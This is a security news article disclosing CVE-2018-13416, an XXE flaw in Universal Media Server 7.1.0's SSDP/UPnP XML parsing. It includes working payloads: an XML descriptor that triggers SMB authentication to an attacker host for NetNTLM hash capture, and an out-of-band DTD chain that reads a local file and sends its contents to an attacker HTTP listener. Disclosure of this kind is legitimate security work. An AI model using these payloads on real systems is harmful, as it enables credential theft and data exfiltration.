Security

Universal Media Server 7.1.0’s SSDP/UPNP Functionality Found Vulnerable to Remote Command Execution in Windows Domains

An out-of-band XML External Entity Processing Vulnerability has been found by Chris Moberly in the XML parsing engine of Universal Media Server’s version 7.1.0. The vulnerability, allotted the reserved label CVE-2018-13416, affects the Simple Service Discovery Protocol (SSDP) and Universal Plug and Play (UPnP) functionality of the service.

Universal Media Server is a free service that relays audio, video, and imagery to DLNA-capable devices. It works well with the Sony PlayStations 3 and 4, Microsoft’s Xbox 360 and One, and a wide variety of smartphones, smart televisions, smart displays, and smart multimedia players.

The vulnerability allows an unauthenticated attacker on the same LAN to access files on the system with the same permissions as the authorized user who is running the Universal Media Server’s service. The attacker is also able to use Server Message Block (SMB) connections to manipulate the NetNTLM security protocol into exposing information that can be converted into clear-text. This can easily be used to steal passwords and other credentials from the user. Using the same mechanism, the attacker can execute commands on Windows devices remotely by challenging or responding to the NetNTLM security protocol.

The SSDP service sends out a UDP multicast to 239.255.255.250 on port 1900 for the discovery and pairing of UPnP devices. Once this connection is established, the device sends back a location for a Device Descriptor XML file that contains more information about the shared device. UMS then harnesses information from this XML file over HTTP to establish the connection. The vulnerability in this comes forward when attackers create their own XML files at the intended location, allowing them to manipulate the behavior of UMS and its communications in this regard. As UMS parses the deployed XML file, it accesses the SMB at the variable $smbServer, allowing an attacker to use this channel to challenge or respond to the NetNTLM security protocol as desired.

The risk that this vulnerability poses is the compromise of sensitive information at the very least and remote command execution at the highest level of exploit. It has been found to affect version 7.1.0 of the Universal Media Server on Windows 10 devices. It is also suspected that earlier versions of UMS are vulnerable to the same issue but only version 7.1.0 has been tested for it thus far.

The most basic exploit of this vulnerability requires that the attacker set the XML file to read the following. This grants the attacker access to the NetNTLM security protocol, allowing lateral movement through the network on the basis of a single compromised account.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
    <specVersion>
        <major>1</major>
        <minor>0</minor>
    </specVersion>
    <device>

If the attacker exploits the vulnerability by executing the evil-ssdp tool from a host and launches a netcat listener or Impacket on the same device, the attacker will be able to manipulate the SMB communications of the device and extract data, passwords, and information in clear text. An attacker can also retrieve full single-line information from files from the victim’s computer remotely by setting the Device Descriptor XML file to read the following:

<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>

This prompts the system to return to collect another data.dtd file which the attacker could set to read:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;

By manipulating these two files, the attacker can retrieve single line information from files on the victim’s computer given that the attacker sets the command to look in a specific place.

UMS was informed of this vulnerability within hours of its discovery and the company has informed that they are working on a patch to resolve the security issue.

Close